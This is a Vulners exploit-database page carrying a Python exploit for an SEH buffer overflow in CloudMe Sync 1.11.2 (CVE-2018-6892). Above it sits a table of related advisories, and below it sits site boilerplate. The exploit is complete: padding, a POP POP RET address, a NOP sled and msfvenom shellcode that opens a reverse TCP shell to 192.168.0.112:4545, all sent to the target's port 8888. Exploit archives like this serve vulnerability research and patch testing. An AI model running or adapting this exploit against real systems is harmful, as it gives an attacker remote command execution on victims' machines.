Vulners
Lucene search
CloudMe 1.11.2 SEH Buffer Overflow Exploit
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | CloudMe Sync 1.10.9 Remote Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.10.9 Buffer Overflow Exploit | 23 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.9.2 Remote Buffer Overflow Exploit | 6 Mar 201800:00 | – | zdt |
| Cloudme 1.9 - Buffer Overflow (DEP) Учздщше | 14 Aug 201800:00 | – | zdt |
| CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Exploit | 22 Jan 201900:00 | – | zdt |
| CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Exploit | 28 Jan 201900:00 | – | zdt |
| CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) Exploit (2) | 29 Sep 202000:00 | – | zdt |
 | CVE-2018-6892 | 13 Feb 201800:00 | – | circl |
 | CloudMe Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | cnvd |
 | CloudMe Sync Buffer Overflow (CVE-2018-6892) | 2 Aug 202000:00 | – | checkpoint_advisories |
10
import socket
import sys
target = "127.0.0.1"
#Written by : lutzenfried (Clement Cruchet)
#Exploiting CloudMe 1.11.2 (Publisher : CloudMe AB)
#Windows x64 10.0.18362 Build 18362
#Buffer Overflow using SEH overwritten technic (POP POP RET)
#Exploit for CVE-2018-6892
#Technical information used for exploit development
#Register EIP is overwritten with pattern at position 1052 in thread 1676
#SEH register is overwritten with pattern at position 2344 in thread 1676
#Bad characters : \x00\x0A\x0D
#0x61f2ba2e | pop edi, pop ebp, ret | False | False | False | False | False | C:\Users\user1\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll
buf = "\x41" * 2344
seh = "\xEB\x08\x90\x90" #Replace to short JMP
nseh = "\x2e\xba\xf2\x61" #Replace to POP POP RET
nopsled = b"\x90"*20 #NOP sled to go into payload
#msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.0.112 LPORT=4545 -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xda\xdb\xbf\x52\xf0\xea\x4a\xd9\x74\x24\xf4\x58\x33"
payload += b"\xc9\xb1\x56\x83\xe8\xfc\x31\x78\x14\x03\x78\x46\x12"
payload += b"\x1f\xb6\x8e\x50\xe0\x47\x4e\x35\x68\xa2\x7f\x75\x0e"
payload += b"\xa6\x2f\x45\x44\xea\xc3\x2e\x08\x1f\x50\x42\x85\x10"
payload += b"\xd1\xe9\xf3\x1f\xe2\x42\xc7\x3e\x60\x99\x14\xe1\x59"
payload += b"\x52\x69\xe0\x9e\x8f\x80\xb0\x77\xdb\x37\x25\xfc\x91"
payload += b"\x8b\xce\x4e\x37\x8c\x33\x06\x36\xbd\xe5\x1d\x61\x1d"
payload += b"\x07\xf2\x19\x14\x1f\x17\x27\xee\x94\xe3\xd3\xf1\x7c"
payload += b"\x3a\x1b\x5d\x41\xf3\xee\x9f\x85\x33\x11\xea\xff\x40"
payload += b"\xac\xed\x3b\x3b\x6a\x7b\xd8\x9b\xf9\xdb\x04\x1a\x2d"
payload += b"\xbd\xcf\x10\x9a\xc9\x88\x34\x1d\x1d\xa3\x40\x96\xa0"
payload += b"\x64\xc1\xec\x86\xa0\x8a\xb7\xa7\xf1\x76\x19\xd7\xe2"
payload += b"\xd9\xc6\x7d\x68\xf7\x13\x0c\x33\x9f\xd0\x3d\xcc\x5f"
payload += b"\x7f\x35\xbf\x6d\x20\xed\x57\xdd\xa9\x2b\xaf\x54\xbd"
payload += b"\xcb\x7f\xde\xae\x35\x80\x1e\xe6\xf1\xd4\x4e\x90\xd0"
payload += b"\x54\x05\x60\xdc\x80\xb3\x6a\x4a\x21\x49\x65\xbf\x5d"
payload += b"\x4f\x79\xae\x5c\xc6\x9f\x80\x0e\x88\x0f\x61\xff\x68"
payload += b"\xe0\x09\x15\x67\xdf\x2a\x16\xa2\x48\xc0\xf9\x1a\x20"
payload += b"\x7d\x63\x07\xba\x1c\x6c\x92\xc6\x1f\xe6\x16\x36\xd1"
payload += b"\x0f\x53\x24\x06\x68\x9b\xb4\xd7\x1d\x9b\xde\xd3\xb7"
payload += b"\xcc\x76\xde\xee\x3a\xd9\x21\xc5\x39\x1e\xdd\x98\x0b"
payload += b"\x54\xe8\x0e\x33\x02\x15\xdf\xb3\xd2\x43\xb5\xb3\xba"
payload += b"\x33\xed\xe0\xdf\x3b\x38\x95\x73\xae\xc3\xcf\x20\x79"
payload += b"\xac\xed\x1f\x4d\x73\x0e\x4a\xcd\x74\xf0\x08\xfa\xdc"
payload += b"\x98\xf2\xba\xdc\x58\x99\x3a\x8d\x30\x56\x14\x22\xf0"
payload += b"\x97\xbf\x6b\x98\x12\x2e\xd9\x39\x22\x7b\xbf\xe7\x23"
payload += b"\x88\x64\x18\x59\xe1\x9b\xd9\x9e\xeb\xff\xda\x9e\x13"
payload += b"\xfe\xe7\x48\x2a\x74\x26\x49\x09\x87\x1d\xec\x38\x02"
payload += b"\x5d\xa2\x3b\x07"
run = buf + seh + nseh + nopsled + payload
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(run)
except Exception as e:
print(sys.exc_value)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Aug 2020 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 27.5
CVSS 39.8
EPSS0.89668